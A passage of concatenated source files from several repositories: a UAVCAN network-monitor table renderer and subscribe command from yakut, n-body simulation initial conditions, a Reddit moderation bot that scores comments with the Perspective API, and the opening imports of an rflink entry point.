S_ADVISORY = Style(fg=Color.MAGENTA, salience=1)
S_CAUTION = Style(fg=Color.YELLOW, salience=1)
S_WARNING = Style(fg=Color.RED, salience=1)
S_NOTICE = Style(fg=Color.CYAN, salience=1)
S_NICE = Style(fg=Color.GREEN, bg=Color.BLACK, salience=1)
S_POOR = Style(fg=Color.YELLOW, bg=Color.BLACK, salience=1)
class View:
_CONNECTIVITY_MATRIX_CELL_WIDTH = 5
def __init__(self) -> None:
self._fragments: List[str] = []
self._node_table_renderer = TableRenderer(map(len, View._NODE_TABLE_HEADER), separate_columns=True)
self._connectivity_matrix_renderer = TableRenderer(
(View._CONNECTIVITY_MATRIX_CELL_WIDTH for _ in range(N_NODES + 1)),
separate_columns=False,
)
legend_canvas = Canvas()
row = 0
col = legend_canvas.put(row, 0, "APPLICATION LAYER CONNECTIVITY MATRIX [t/s=transfer/second] Colors: ")
col = legend_canvas.put(
row, col, "pub/cln", style=get_matrix_cell_style(tx=True, rx=False, recently_active=False)
)
col = legend_canvas.put(row, col, "│")
col = legend_canvas.put(
row, col, "sub/srv", style=get_matrix_cell_style(tx=False, rx=True, recently_active=False)
)
col = legend_canvas.put(row, col, "│")
col = legend_canvas.put(
row,
col,
"(pub+sub)/(cln+srv)",
style=get_matrix_cell_style(tx=True, rx=True, recently_active=False),
)
col = legend_canvas.put(row, col, "│")
col = legend_canvas.put(
row, col, "activity", style=get_matrix_cell_style(tx=False, rx=False, recently_active=True)
)
col = legend_canvas.put(row, col, "│uavcan.node.port.List is ")
col = legend_canvas.put(row, col, "published", style=S_NICE)
col = legend_canvas.put(row, col, "/")
col = legend_canvas.put(row, col, "not", style=S_POOR)
legend_canvas.put(row, col, "│")
self._connectivity_matrix_legend = legend_canvas.flip_buffer()
def flip_buffer(self) -> str:
out = "\n".join(self._fragments)
self._fragments = []
return out
def render(
self,
states: Dict[Optional[int], NodeState],
xfer_deltas: spmatrix,
xfer_rates: spmatrix,
byte_rates: spmatrix,
total_transport_errors: int,
fir_window_duration: float,
) -> None:
self._fragments.append(self._render_node_table(states))
self._fragments.append(self._connectivity_matrix_legend)
self._fragments.append(self._render_connectivity_matrix(states, xfer_deltas, xfer_rates, byte_rates))
annotation_canvas = Canvas()
col = annotation_canvas.put(0, 0, "Total transport layer errors:")
col = annotation_canvas.put(
0,
col,
f"{total_transport_errors:9d}",
style=S_POOR if total_transport_errors > 0 else S_NICE,
)
col += 9
col = annotation_canvas.put(0, col, f"Values averaged over {fir_window_duration:.1f} sec")
_ = col
self._fragments.append(annotation_canvas.flip_buffer())
# noinspection SpellCheckingInspection
_NODE_TABLE_HEADER = [
"NodID",
"Mode",
"Health",
"VSSC",
"Uptime".ljust(14),
"VProtcl",
"VHardwr",
"VSoftware(major.minor.vcs.crc)".ljust(41),
"Unique-ID".ljust(32),
"Name",
]
def _render_node_table(self, states: Dict[Optional[int], NodeState]) -> str:
for idx, s in enumerate(View._NODE_TABLE_HEADER):
self._node_table_renderer[0, idx] = s
for idx, (node_id, ss) in enumerate(states.items()):
col = 0
def put(data: Any, style: Optional[Style]) -> None:
nonlocal col
self._node_table_renderer[idx + 1, col] = data, (style or S_DEFAULT)
col += 1
if node_id is not None:
if not ss.online:
put(node_id, S_MUTED)
else:
put(node_id, None)
else:
put("anon", None if ss.online else S_MUTED)
if ss.heartbeat:
if node_id is None and ss.online:
sty_override: Optional[Style] = S_FAILURE # Anonymous nodes shall not publish heartbeat.
elif not ss.online:
sty_override = S_MUTED
else:
sty_override = None
txt, sty = render_mode(ss.heartbeat.mode)
put(txt, sty_override or sty)
txt, sty = render_health(ss.heartbeat.health)
put(txt, sty_override or sty)
put(ss.heartbeat.vendor_specific_status_code, sty_override)
else:
put("?", S_MUTED)
put("?", S_MUTED)
put("?", S_MUTED)
if ss.online:
if ss.heartbeat is None:
if node_id is not None:
put("zombie", S_FAILURE)
else:
put("online", None)
else:
put(render_uptime(ss.heartbeat.uptime), None)
else:
put("offline", S_MUTED)
if ss.info:
sty = None if ss.online and ss.heartbeat else S_MUTED
put(
render_version(ss.info.protocol_version),
sty if ss.info.protocol_version.major == pyuavcan.UAVCAN_SPECIFICATION_VERSION[0] else S_FAILURE,
)
put(render_version(ss.info.hardware_version), sty)
put(
render_full_software_version(
ss.info.software_version,
ss.info.software_vcs_revision_id,
int(ss.info.software_image_crc[0]) if len(ss.info.software_image_crc) > 0 else None,
),
sty,
)
put(ss.info.unique_id.tobytes().hex(), sty)
# Best effort to display bad names
put("".join(ss.info.name.tobytes().decode(errors="ignore").split()), sty)
else:
for _ in range(5):
put("?", S_MUTED)
return self._node_table_renderer.flip_buffer()
# noinspection SpellCheckingInspection
def _render_connectivity_matrix(
self,
states: Dict[Optional[int], NodeState],
xfer_delta: spmatrix,
xfer_rates: spmatrix,
byte_rates: spmatrix,
) -> str:
tbl = self._connectivity_matrix_renderer
online_states: Dict[Optional[int], NodeState] = {k: v for k, v in states.items() if v.online}
# This part took some time to get right to avoid accidental dense matrix operations, which are super slow.
xfer_rates_by_ds = xfer_rates.sum(axis=0)
assert xfer_rates_by_ds.size == N_SUBJECTS + N_SERVICES * 2
xfer_delta_by_ds = xfer_delta.sum(axis=0)
byte_rates_by_ds = byte_rates.sum(axis=0)
# Consider a port existing if either holds:
# - there have been recent transfers, even if the source nodes have gone offline
# - if the port was recently reported via uavcan.node.port.List, even if the node is currently offline
all_subjects: Set[int] = set()
all_services: Set[int] = set()
for y in xfer_rates_by_ds.nonzero()[1]:
y = int(y)
if y < N_SUBJECTS:
all_subjects.add(y)
else:
all_services.add((y - N_SUBJECTS) % N_SERVICES)
for node_id, state in states.items():
if state.ports is not None:
all_subjects |= state.ports.pub
# Subjects that are only subscribed to by supersubscribers are only shown if there are other nodes
# utilizing these.
if len(state.ports.sub) < N_SUBJECTS:
all_subjects |= state.ports.sub
all_services |= state.ports.cln
all_services |= state.ports.srv
# HEADER ROWS AND COLUMNS
num_nodes = len(online_states)
num_subjects = len(all_subjects)
num_services = len(all_services)
row_subject = 0
row_service = row_subject + num_subjects + 3
row_total = row_service + num_services + 3
tbl[row_subject, 0] = "MESSG", S_MUTED
tbl[row_service, 0] = "RQ+RS", S_MUTED
tbl[row_total, 0] = "TOTAL", S_MUTED
for row in (row_subject + num_subjects + 1, row_service + num_services + 1):
tbl[row + 0, num_nodes + 3] = "↖ t/s", S_MUTED
tbl[row + 1, num_nodes + 3] = "", S_MUTED
for row in (row_subject, row_service, row_total): # Row of node-IDs and per-port totals.
for ii, (node_id, state) in enumerate(online_states.items()):
sty = S_POOR if state.ports is None else S_NICE
if node_id is not None:
tbl[row, ii + 1] = node_id, sty
else:
tbl[row, ii + 1] = " anon", sty
tbl[row, num_nodes + 1] = " ∑t/s"
tbl[row, num_nodes + 2] = " ∑B/s"
for row in (row_subject + num_subjects, row_service + num_services, row_total): # Per-node totals.
tbl[row + 1, 0] = "∑t/s"
tbl[row + 2, 0] = "∑B/s"
for ii, sid in enumerate(sorted(all_subjects)): # Subject-ID and Service-ID.
for col in (0, num_nodes + 3):
tbl[row_subject + ii + 1, col] = sid, S_DEFAULT
for ii, sid in enumerate(sorted(all_services)):
for col in (0, num_nodes + 3):
tbl[row_service + ii + 1, col] = sid, S_DEFAULT
# CONTENTS
View._render_subject_matrix_contents(
lambda row, col, data, style: tbl.set_cell(row + row_subject + 1, col + 1, data, style=style),
states=online_states,
subjects=all_subjects,
xfer_delta=xfer_delta,
xfer_rates=xfer_rates,
byte_rates=byte_rates,
xfer_delta_by_port=xfer_delta_by_ds,
xfer_rates_by_port=xfer_rates_by_ds,
byte_rates_by_port=byte_rates_by_ds,
)
def slice_req_rsp(m: _T) -> Tuple[_T, _T]:
a = N_SUBJECTS + N_SERVICES * 0
b = N_SUBJECTS + N_SERVICES * 1
c = N_SUBJECTS + N_SERVICES * 2
return (m[:, a:b], m[:, b:c]) # type: ignore
View._render_service_matrix_contents(
lambda row, col, data, style: tbl.set_cell(row + row_service + 1, col + 1, data, style=style),
states=online_states,
services=all_services,
xfer_delta=slice_req_rsp(xfer_delta),
xfer_rates=slice_req_rsp(xfer_rates),
byte_rates=slice_req_rsp(byte_rates),
xfer_delta_by_port=slice_req_rsp(xfer_delta_by_ds),
xfer_rates_by_port=slice_req_rsp(xfer_rates_by_ds),
byte_rates_by_port=slice_req_rsp(byte_rates_by_ds),
)
# TOTAL DATA RATE
xfer_delta_by_node = xfer_delta.sum(axis=1)
xfer_rates_by_node = xfer_rates.sum(axis=1)
byte_rates_by_node = byte_rates.sum(axis=1)
for ii, node_id in enumerate(online_states):
x = node_id if node_id is not None else N_NODES
sty = get_matrix_cell_style(None, None, int(xfer_delta_by_node[x]) > 0)
tbl[row_total + 1, ii + 1] = render_xfer_rate(float(xfer_rates_by_node[x])), sty
tbl[row_total + 2, ii + 1] = render_xfer_rate(float(byte_rates_by_node[x])), sty
# Sum the DS-wise vectors because they are usually faster due to being smaller.
sty = get_matrix_cell_style(None, None, int(xfer_delta_by_ds.sum()) > 0)
tbl[row_total + 1, num_nodes + 1] = render_xfer_rate(float(xfer_rates_by_ds.sum())), sty
tbl[row_total + 2, num_nodes + 2] = render_byte_rate(float(byte_rates_by_ds.sum())), sty
tbl[row_total + 1, num_nodes + 3] = ""
tbl[row_total + 2, num_nodes + 3] = ""
return tbl.flip_buffer()
@staticmethod
def _render_subject_matrix_contents(
put: Callable[[int, int, Any, Style], None],
states: Dict[Optional[int], NodeState],
subjects: AbstractSet[int],
xfer_delta: spmatrix,
xfer_rates: spmatrix,
byte_rates: spmatrix,
xfer_delta_by_port: matrix,
xfer_rates_by_port: matrix,
byte_rates_by_port: matrix,
) -> None:
recent_by_node: Dict[Optional[int], bool] = defaultdict(bool)
xfer_rate_by_node: Dict[Optional[int], float] = defaultdict(float)
byte_rate_by_node: Dict[Optional[int], float] = defaultdict(float)
for row, subject_id in enumerate(sorted(subjects)):
for col, (node_id, state) in enumerate(states.items()):
x = node_id if node_id is not None else N_NODES
recent = int(xfer_delta[x, subject_id]) > 0
rate = float(xfer_rates[x, subject_id])
if state.ports is not None:
pub = subject_id in state.ports.pub
sub = subject_id in state.ports.sub
sty = get_matrix_cell_style(pub, sub, recent)
text = render_xfer_rate(rate) if pub or (rate > EPSILON) else ""
else:
sty = get_matrix_cell_style(None, None, recent)
text = render_xfer_rate(rate) if rate > EPSILON else ""
put(row, col, text, sty)
recent_by_node[node_id] |= recent
xfer_rate_by_node[node_id] += rate
byte_rate_by_node[node_id] += byte_rates[x, subject_id]
recent = xfer_delta_by_port[0, subject_id] > 0
sty = get_matrix_cell_style(None, None, recent)
put(row, len(states) + 0, render_xfer_rate(xfer_rates_by_port[0, subject_id]), sty)
put(row, len(states) + 1, render_byte_rate(byte_rates_by_port[0, subject_id]), sty)
row = len(subjects)
for col, node_id in enumerate(states):
sty = get_matrix_cell_style(None, None, recent_by_node[node_id])
put(row + 0, col, render_xfer_rate(xfer_rate_by_node[node_id]), sty)
put(row + 1, col, render_byte_rate(byte_rate_by_node[node_id]), sty)
sty = get_matrix_cell_style(None, None, sum(recent_by_node.values()) > 0)
put(row + 0, len(states) + 0, render_xfer_rate(sum(xfer_rate_by_node.values())), sty)
put(row + 1, len(states) + 1, render_byte_rate(sum(byte_rate_by_node.values())), sty)
@staticmethod
def _render_service_matrix_contents(
put: Callable[[int, int, Any, Style], None],
states: Dict[Optional[int], NodeState],
services: AbstractSet[int],
xfer_delta: Tuple[spmatrix, spmatrix],
xfer_rates: Tuple[spmatrix, spmatrix],
byte_rates: Tuple[spmatrix, spmatrix],
xfer_delta_by_port: Tuple[matrix, matrix],
xfer_rates_by_port: Tuple[matrix, matrix],
byte_rates_by_port: Tuple[matrix, matrix],
) -> None:
# We used to display two rows per service: separate request and response. It is very informative but a bit
# expensive in terms of the screen space, which is very limited when large networks are involved.
# So while the data provided to this method is sufficient to build a super-detailed representation,
# currently we collapse it into one service per row such that request and response states are joined together.
        # We may change it later should the need arise.
xfer_delta_uni: spmatrix = sum(xfer_delta)
byte_rates_uni: spmatrix = sum(byte_rates)
xfer_delta_by_port_uni: matrix = sum(xfer_delta_by_port)
xfer_rates_by_port_uni: matrix = sum(xfer_rates_by_port)
byte_rates_by_port_uni: matrix = sum(byte_rates_by_port)
recent_by_node: Dict[Optional[int], bool] = defaultdict(bool)
xfer_rate_by_node: Dict[Optional[int], float] = defaultdict(float)
byte_rate_by_node: Dict[Optional[int], float] = defaultdict(float)
for row, service_id in enumerate(sorted(services)):
for col, (node_id, state) in enumerate(states.items()):
x = node_id if node_id is not None else N_NODES
recent = int(xfer_delta_uni[x, service_id]) > 0
rate_req = float(xfer_rates[0][x, service_id])
rate_rsp = float(xfer_rates[1][x, service_id])
rate_total = rate_req + rate_rsp
if state.ports is not None:
cln = service_id in state.ports.cln
srv = service_id in state.ports.srv
sty = get_matrix_cell_style(tx=cln, rx=srv, recently_active=recent)
text = render_xfer_rate(rate_total) if cln or srv or (rate_total > EPSILON) else ""
else:
sty = get_matrix_cell_style(None, None, recent)
text = render_xfer_rate(rate_total) if rate_total > EPSILON else ""
put(row, col, text, sty)
recent_by_node[node_id] |= recent
xfer_rate_by_node[node_id] += rate_total
byte_rate_by_node[node_id] += byte_rates_uni[x, service_id]
recent = int(xfer_delta_by_port_uni[0, service_id]) > 0
sty = get_matrix_cell_style(None, None, recent)
put(row, len(states) + 0, render_xfer_rate(xfer_rates_by_port_uni[0, service_id]), sty)
put(row, len(states) + 1, render_byte_rate(byte_rates_by_port_uni[0, service_id]), sty)
total_recent = False
total_xfer_rate = 0.0
total_byte_rate = 0.0
row = len(services)
for col, node_id in enumerate(states):
recent = recent_by_node[node_id] > 0
xfer_rate = xfer_rate_by_node[node_id]
byte_rate = byte_rate_by_node[node_id]
total_recent = total_recent or recent
total_xfer_rate += xfer_rate
total_byte_rate += byte_rate
sty = get_matrix_cell_style(None, None, recent)
put(row + 0, col, render_xfer_rate(xfer_rate), sty)
put(row + 1, col, render_byte_rate(byte_rate), sty)
sty = get_matrix_cell_style(None, None, total_recent)
put(row + 0, len(states) + 0, render_xfer_rate(total_xfer_rate), sty)
put(row + 1, len(states) + 1, render_byte_rate(total_byte_rate), sty)
@functools.lru_cache(None)
def get_matrix_cell_style(tx: Optional[bool], rx: Optional[bool], recently_active: bool) -> Style:
salience = 1 if recently_active else -1
fg = Color.RED if recently_active else Color.WHITE
if tx and rx:
return Style(fg=fg, bg=Color.CYAN, salience=salience)
if tx:
return Style(fg=fg, bg=Color.BLUE, salience=salience)
if rx:
return Style(fg=fg, bg=Color.GREEN, salience=salience)
return Style(fg=fg, bg=Color.BLACK, salience=salience)
# noinspection SpellCheckingInspection
def render_mode(val: uavcan.node.Mode_1_0) -> Tuple[str, Optional[Style]]:
if val.value == val.OPERATIONAL:
return "oper", None
if val.value == val.INITIALIZATION:
return "init", S_NOTICE
if val.value == val.MAINTENANCE:
return "mntn", S_ADVISORY
if val.value == val.SOFTWARE_UPDATE:
return "swup", S_CAUTION
return str(val.value), S_FAILURE # pragma: no cover
# noinspection SpellCheckingInspection
def render_health(val: uavcan.node.Health_1_0) -> Tuple[str, Optional[Style]]:
if val.value == val.NOMINAL:
return "nomina", None
if val.value == val.ADVISORY:
return "adviso", S_ADVISORY
if val.value == val.CAUTION:
return "cautio", S_CAUTION
if val.value == val.WARNING:
return "warnin", S_WARNING
return str(val.value), S_FAILURE # pragma: no cover
def render_uptime(val: int) -> str:
return f"{val // (3600 * 24):5d}d{(val // 3600) % 24:02d}:{(val // 60) % 60:02d}:{val % 60:02d}"
def render_version(val: uavcan.node.Version_1_0) -> str:
return "% 3d.%-3d" % (val.major, val.minor)
def render_full_software_version(version: uavcan.node.Version_1_0, vcs_revision_id: int, crc: Optional[int]) -> str:
out = f"{version.major:3d}.{version.minor}"
if vcs_revision_id != 0 or crc is not None:
out += f".{vcs_revision_id:016x}"
if crc is not None:
out += f".{crc:016x}"
return out.ljust(41)
def render_xfer_rate(x: float) -> str:
x = max(x, 0.0) # The value may be slightly negative due to accumulated floating point error
if x < 1e3:
return f"{x:4.0f} "
if x < 1e6:
return f"{x / 1e3:4.0f}k"
return f"{x / 1e6:4.0f}M"
def render_byte_rate(x: float) -> str:
x = max(x, 0.0) # The value may be slightly negative due to accumulated floating point error
if x < 1024:
return f"{x:4.0f} "
if x < 1024 * 1024:
return f"{x / 1024:4.0f}K"
return f"{x / (1024 * 1024):4.0f}M"
EPSILON = sys.float_info.epsilon
_T = TypeVar("_T")
_logger = yakut.get_logger(__name__)
```
#### File: yakut/cmd/subscribe.py
```python
import sys
import typing
import logging
import contextlib
import click
import pyuavcan
from pyuavcan.presentation import Presentation, Subscriber
import yakut
from yakut.param.formatter import Formatter
from yakut.util import convert_transfer_metadata_to_builtin, construct_port_id_and_type
_M = typing.TypeVar("_M", bound=pyuavcan.dsdl.CompositeObject)
_logger = yakut.get_logger(__name__)
@yakut.subcommand()
@click.argument("subject", type=str, nargs=-1)
@click.option(
"--with-metadata/--no-metadata",
"+M/-M",
default=True,
show_default=True,
help="When enabled, each message object is prepended with an extra field named `_metadata_`.",
)
@click.option(
"--count",
"-N",
type=int,
metavar="CARDINAL",
help=f"""
Exit automatically after this many messages (or synchronous message groups) have been received. No limit by default.
""",
)
@yakut.pass_purser
def subscribe(
purser: yakut.Purser,
subject: typing.Tuple[str, ...],
with_metadata: bool,
count: typing.Optional[int],
) -> None:
"""
Subscribe to specified subjects and print messages into stdout.
This command does not instantiate a local node and does not disturb the network in any way,
so many instances can be cheaply executed concurrently.
It is recommended to use anonymous transport (i.e., without a node-ID).
The arguments are a list of message data type names prepended with the subject-ID;
the subject-ID may be omitted if the data type defines a fixed one:
\b
[SUBJECT_ID:]TYPE_NAME.MAJOR.MINOR
If multiple subjects are specified, a synchronous subscription will be used.
It is useful for subscribing to a group of coupled subjects like lockstep sensor feeds,
but it will not work for subjects that are temporally unrelated or published at different rates.
Each object emitted into stdout is a key-value mapping where the number of elements equals the number
of subjects the command is asked to subscribe to;
the keys are subject-IDs and values are the received message objects.
In data type names forward or backward slashes can be used instead of ".";
version numbers can be also separated using underscores.
This is done to allow the user to rely on filesystem autocompletion when typing the command.
Examples:
\b
yakut sub 33:uavcan.si.unit.angle.Scalar.1.0 --no-metadata
"""
_logger.debug("subject=%r, with_metadata=%r, count=%r", subject, with_metadata, count)
if not subject:
_logger.info("Nothing to do because no subjects are specified")
return
if count is not None and count <= 0:
_logger.info("Nothing to do because count=%s", count)
return
count = count if count is not None else sys.maxsize
formatter = purser.make_formatter()
transport = purser.get_transport()
if transport.local_node_id is not None:
_logger.info("It is recommended to use an anonymous transport with this command.")
with contextlib.closing(Presentation(transport)) as presentation:
subscriber = _make_subscriber(subject, presentation)
try:
_run(subscriber, formatter, with_metadata=with_metadata, count=count)
finally:
if _logger.isEnabledFor(logging.INFO):
_logger.info("%s", presentation.transport.sample_statistics())
_logger.info("%s", subscriber.sample_statistics())
def _make_subscriber(subjects: typing.Sequence[str], presentation: Presentation) -> Subscriber[_M]:
group = [construct_port_id_and_type(ds) for ds in subjects]
assert len(group) > 0
if len(group) == 1:
((subject_id, dtype),) = group
return presentation.make_subscriber(dtype, subject_id)
raise NotImplementedError(
"Multi-subject subscription is not yet implemented. See https://github.com/UAVCAN/pyuavcan/issues/65"
)
@yakut.asynchronous
async def _run(subscriber: Subscriber[_M], formatter: Formatter, with_metadata: bool, count: int) -> None:
async for msg, transfer in subscriber:
assert isinstance(transfer, pyuavcan.transport.TransferFrom)
outer: typing.Dict[int, typing.Dict[str, typing.Any]] = {}
bi: typing.Dict[str, typing.Any] = {} # We use updates to ensure proper dict ordering: metadata before data
if with_metadata:
bi.update(convert_transfer_metadata_to_builtin(transfer))
bi.update(pyuavcan.dsdl.to_builtin(msg))
outer[subscriber.port_id] = bi
print(formatter(outer))
count -= 1
if count <= 0:
_logger.debug("Reached the specified message count, stopping")
break
```
|
{
"source": "jeypiti/n-body-sim",
"score": 3
}
|
#### File: n-body-sim/src/init_cond.py
```python
import numpy as np
__author__ = "jeypiti"
__copyright__ = "Copyright 2022, jeypiti"
__credits__ = ["jeypiti"]
__license__ = "MIT"
solar = 1.9885e30
mercury = 3.3011e23
venus = 4.8675e24
earth = 5.97237e24
mars = 6.4171e23
jupiter = 1.8982e27
saturn = 5.6834e26
neptune = 1.02413e26
uranus = 8.6810e25
pluto = 1.303e22
def generate_planetary_system(bodies, max_mass=1e-3, seed=None):
"""
Randomly generates initial conditions for a planetary system. Depending on
the exact starting positions, numerical errors in the simulation may lead
to problems, e.g. bodies being ejected from the system. The chance of this
happening increases with the number of bodies in the system.
The system will be spinning anticlockwise.
:param bodies: Number of bodies in the system.
:param max_mass: Maximum mass of the outer bodies. The central body has mass 1.
:param seed: Seed for the pseudorandom number generator.
    :return: Values for (n,) masses, (n, 2) positions, and (n, 2) velocities.
"""
rng = np.random.default_rng(seed)
masses = rng.uniform(0, max_mass, (bodies,))
# generate polar coordinates & convert to cartesian
theta = rng.uniform(0, 2 * np.pi, (bodies,))
r = rng.gamma(7.5, 1, (bodies,)) * bodies ** 0.8
pos = np.vstack((r * np.cos(theta), r * np.sin(theta))).T
# calculate magnitude of velocity under the approximation of a two-body system
v = np.sqrt(1 / r)
vel = np.vstack((-v * np.sin(theta), v * np.cos(theta))).T
# overwrite first body with heavy central mass
masses[0] = 1
pos[0, :] = vel[0, :] = 0
return masses, pos, vel
# modeled after our solar system
solar_system = (
np.array((solar, mercury, venus, earth, mars, jupiter, saturn, uranus, pluto)) / solar,
np.array(
(
(0, 0),
(0, 1.29),
(0, -2.4),
(-2.35, 2.35),
(3.58, -3.58),
(12.21, 12.21),
(-22.44, -22.44),
(-45.07, 45.07),
(99.03, 13.92),
)
),
np.array(
(
(0, 0),
(0.88, 0),
(-0.645, 0),
(0.388, 0.388),
(-0.314, -0.314),
(0.17, -0.17),
(-0.125, 0.125),
(0.0886, 0.0886),
(0.014, -0.099),
)
),
)
# solar system reduced to four bodies
small_solar_system = (
np.array((solar, mercury, venus, uranus)) / solar,
np.array(((0, 0), (0, 1.29), (0, -2.4), (-45.07, 45.07))),
np.array(((0, 0), (0.88, 0), (-0.645, 0), (0.0886, 0.0886))),
)
# periodic figure eight structure by:
# Chenciner, Montgomery. "A remarkable periodic solution of the
# three-body problem in the case of equal masses". 2000.
figure_eight = (
np.array((1.0, 1.0, 1.0)),
np.array(
(
(-0.97000436, 0.24308753),
(0.0, 0.0),
(0.97000436, -0.24308753),
)
),
np.array(
(
(0.93240737 / 2, 0.86473146 / 2),
(-0.93240737, -0.86473146),
(0.93240737 / 2, 0.86473146 / 2),
)
),
)
random_planetary_system = generate_planetary_system(20, seed=31415)
# periodic initial conditions by:
# <NAME>, <NAME>, <NAME>. "The 1223 new periodic orbits of
# planar three-body problem with unequal mass and zero angular momentum". 2017.
three_body_periodic1 = (
np.array((1.0, 1.0, 0.5)),
np.array(
(
(-1.0, 0.0),
(1.0, 0.0),
(0.0, 0.0),
)
),
np.array(
(
(0.2009656237, 0.2431076328),
(0.2009656237, 0.2431076328),
(-4 * 0.2009656237, -4 * 0.2431076328),
)
),
)
three_body_periodic2 = (
np.array((1.0, 1.0, 2.0)),
np.array(
(
(-1.0, 0.0),
(1.0, 0.0),
(0.0, 0.0),
)
),
np.array(
(
(0.6649107583, 0.8324167864),
(0.6649107583, 0.8324167864),
(-0.6649107583, -0.8324167864),
)
),
)
# periodic free-fall initial conditions by:
# <NAME>, <NAME>. "Collisionless periodic
# orbits in the free-fall three body problem". 2018.
free_fall_periodic1 = (
np.array((1.0, 0.8, 0.8)),
np.array(
(
(-0.5, 0.0),
(0.5, 0.0),
(0.0009114239, 0.3019805958),
)
),
np.array(
(
(0.0, 0.0),
(0.0, 0.0),
(0.0, 0.0),
)
),
)
free_fall_periodic2 = (
np.array((1.0, 0.8, 0.4)),
np.array(
(
(-0.5, 0.0),
(0.5, 0.0),
(0.1204686367, 0.3718569619),
)
),
np.array(
(
(0.0, 0.0),
(0.0, 0.0),
(0.0, 0.0),
)
),
)
free_fall_periodic3 = (
np.array((1.0, 0.8, 0.2)),
np.array(
(
(-0.5, 0.0),
(0.5, 0.0),
(0.1310631652, 0.3036588095),
)
),
np.array(
(
(0.0, 0.0),
(0.0, 0.0),
(0.0, 0.0),
)
),
)
```
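For reference, a quick shape check for the generator above (body count and seed are arbitrary; the shapes follow the docstring):

```python
masses, pos, vel = generate_planetary_system(5, seed=42)
assert masses.shape == (5,) and pos.shape == (5, 2) and vel.shape == (5, 2)
assert masses[0] == 1  # the first body is the heavy central mass
```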
|
{
"source": "jeypiti/RedditPerspectiveAPI",
"score": 2
}
|
#### File: jeypiti/RedditPerspectiveAPI/script.py
```python
import asyncio
import logging
from random import randint
import aiohttp
from asyncpraw import Reddit
from asyncpraw.models import Comment
from asyncprawcore.exceptions import ServerError
from dynaconf import Dynaconf
from discord_logging import DiscordWebhookHandler
config = Dynaconf(settings_files=["settings.toml", ".secrets.toml"])
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(logging.Formatter(fmt="[{levelname}] {message}", style="{"))
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
if config.webhook:
discord_handler = DiscordWebhookHandler(config.webhook, min_emit_interval=0.0)
discord_handler.setFormatter(
logging.Formatter(
fmt="[{levelname} | {asctime}] {message}",
datefmt="%Y-%m-%d %H:%M:%S %Z",
style="{",
)
)
discord_handler.setLevel(logging.INFO)
logger.addHandler(discord_handler)
url = f"https://commentanalyzer.googleapis.com/v1alpha1/comments:analyze?key={config.credentials.perspective.api_key}"
params = {
"languages": ["en"],
"requestedAttributes": {
"TOXICITY": {},
"SEVERE_TOXICITY": {},
"IDENTITY_ATTACK": {},
"INSULT": {},
"THREAT": {},
},
"communityId": f"reddit.com/r/{config.subreddit}",
}
async def authenticate_reddit(username: str) -> Reddit:
reddit_instance = Reddit(
username=username,
user_agent=f"web:mod.{config.subreddit}.{username}.Perspective:v{config.version} by {config.author})",
**config.credentials[username],
)
logger.info(f"Authenticated as {await reddit_instance.user.me()}!")
return reddit_instance
async def main():
mod_reddit = await authenticate_reddit(config.mod_username)
stream_reddit = await authenticate_reddit(config.stream_username)
subreddit = await stream_reddit.subreddit(config.subreddit)
while True:
try:
async for comment in subreddit.stream.comments(skip_existing=False):
await process_comment(comment, mod_reddit)
except ServerError as e:
sleep_duration = randint(25, 35)
logger.warning(f"Server error, retrying in {sleep_duration}s", exc_info=e)
await asyncio.sleep(sleep_duration)
except Exception as e:
logger.error(f"Encountered exception:", exc_info=e)
raise e
async def process_comment(comment: Comment, mod_reddit: Reddit) -> None:
results = await evaluate_comment(comment)
cleaned_permalink = comment.permalink.replace(comment.permalink.split("/")[5], "_")
log_content = (
f"New comment {comment.id} by {comment.author}\n"
f"https://www.reddit.com{cleaned_permalink}\n"
f"{comment.body[:1500]}\n\n"
)
log_func = logger.debug
for attribute, score in results.items():
log_content += f"{attribute:16s}: {score:6.2%}\n"
if score >= config.threshold[attribute]:
log_func = logger.info
# handoff to mod account to enable free-form report
comment = await mod_reddit.comment(comment.id, lazy=True)
await comment.report(
f"{attribute}: {score:.2%} | threshold: {config.threshold[attribute]:.2%}"
)
log_func(log_content)
async def evaluate_comment(comment: Comment) -> dict[str, float]:
params["comment"] = {"text": comment.body}
async with aiohttp.ClientSession() as session:
# sleep to avoid hitting rate limit
await asyncio.sleep(1)
async with session.post(url, json=params) as response:
response_dict = await response.json()
return {
attribute.lower(): val["summaryScore"]["value"]
for attribute, val in response_dict["attributeScores"].items()
}
if __name__ == "__main__":
try:
asyncio.run(main())
except KeyboardInterrupt:
pass
```
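For reference, a minimal standalone sketch of the Perspective API call wrapped by `evaluate_comment` above. The endpoint and the request/response shapes are taken from this script; the API key, the input text, and the single `TOXICITY` attribute are placeholders.

```python
import asyncio
import aiohttp


async def score_text(text: str, api_key: str) -> dict[str, float]:
    url = f"https://commentanalyzer.googleapis.com/v1alpha1/comments:analyze?key={api_key}"
    body = {
        "comment": {"text": text},
        "languages": ["en"],
        "requestedAttributes": {"TOXICITY": {}},
    }
    async with aiohttp.ClientSession() as session:
        async with session.post(url, json=body) as response:
            data = await response.json()
    return {
        attribute.lower(): val["summaryScore"]["value"]
        for attribute, val in data["attributeScores"].items()
    }


# asyncio.run(score_text("some comment text", "<PERSPECTIVE_API_KEY>"))
```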
|
{
"source": "JeyRathnam/python-restful",
"score": 3
}
|
#### File: python-restful/Models/game_session.py
```python
from Main import db
from serializer.JsonSerializer import JsonSerializer
class Game_session(db.Model, JsonSerializer):
__tablename__ = 'game_session'
session_id = db.Column(db.Integer,primary_key=True, autoincrement=True)
ip_address = db.Column(db.String)
game_id = db.Column(db.Integer,db.ForeignKey('games.game_id'))
player_count = db.Column(db.Integer)
winning_user = db.Column(db.Integer, db.ForeignKey('users.user_id'))
session_start_time = db.Column(db.String)
def __init__(self,_ip_address, _game_id, _player_count , _winning_user,_session_start_time):
self.ip_address = _ip_address
self.game_id = _game_id
self.player_count = _player_count
self.winning_user = _winning_user
self.session_start_time = _session_start_time
```
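For context, a rough usage sketch of this model. It assumes the Flask-SQLAlchemy `db` from `Main` is initialised, that the module is importable as `Models.game_session` (inferred from the file path), and that the referenced `games`/`users` rows exist; all values are made up.

```python
from Main import db
from Models.game_session import Game_session

# create and persist one session row
session_row = Game_session("192.168.0.10", 1, 4, 7, "2022-01-01 20:00:00")
db.session.add(session_row)
db.session.commit()
```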
|
{
"source": "jeyrb/python-rflink",
"score": 3
}
|
#### File: python-rflink/rflink/__main__.py
```python
import asyncio
import logging
import sys
from typing import Dict, Optional, Sequence, Type # noqa: unused-import
import pkg_resources
from docopt import docopt
